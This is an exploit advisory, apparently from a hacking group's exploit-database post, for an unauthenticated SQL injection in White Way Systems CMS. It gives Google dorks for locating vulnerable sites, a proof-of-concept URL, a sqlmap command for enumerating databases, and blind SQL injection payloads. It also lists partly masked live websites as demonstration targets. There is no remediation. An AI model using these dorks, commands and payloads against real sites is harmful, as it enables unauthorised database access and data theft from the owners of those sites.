=========================================================
[+] Title                 :- White Way Systems CMS - SQL Injection Vulnerability 
[+] Date                  :- 19 - June - 2015
[+] Vendor Homepage:      :- http://whitewaysystems.co.za/
[+] Version               :- All Versions
[+] Tested on             :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category              :- webapps
[+] Google Dorks          :- "Developed By: White Way Systems"
                             "Developed By: White Way Systems" +inurl:/.php?id=
		                     "White Way Systems" inurl:"php?id="                            
[+] Exploit Author        :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name             :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website      :- intelligentexploit.com
[+] The official Members  :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to             :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact               :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com

  _________.__     ________       ___________        _____ _______________   
 /   _____/|  |__  \_____  \______\__    ___/__.__. /  |  |\_____  \   _  \  
 \_____  \ |  |  \  /   |   \_  __ \|    | <   |  |/   |  |_/  ____/  /_\  \ 
 /        \|   Y  \/    |    \  | \/|    |  \___  /    ^   /       \  \_/   \
/_______  /|___|  /\_______  /__|   |____|  / ____\____   |\_______ \_____  /
        \/      \/         \/               \/         |__|        \/     \/ 
		
=========================================================
[+] Severity Level          :- High

[+] Request Method(s)       :- GET / POST

[+] Vulnerable Parameter(s) :- id, pid

[+] Affected Area(s)        :- Entire admin, database, Server

[+] About                   :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File     :- home/DOMAIN/public_html/page.php

[+] POC                     :- http://127.0.0.1/page.php?id=[SQL]'

The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.

SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/page.php?id=[SQL]" --dbs
++++++++++++++++++++++++++

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8' AND 2691=2691 AND 'pHlw'='pHlw

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=8' AND SLEEP(5) AND 'WXFL'='WXFL


[+] DEMO :-   http://XXXXsmeat.co.za/page.php?id=8%27
              http://XXXXg.co.za/page.php?id=8%27
              http://XXXXtravels.co.za/page.php?id=47%27
              http://XXXXorn.co.za/page.php?id=7%27
              http://XXXXonix.co.za/ser.php?id=p%27
              http://www.oXXXXtalplaza.co.za/Tourist-Info.php?pid=90%27
              http://spareXXXXis.co.za/page.php?pid=7%27


=======================================================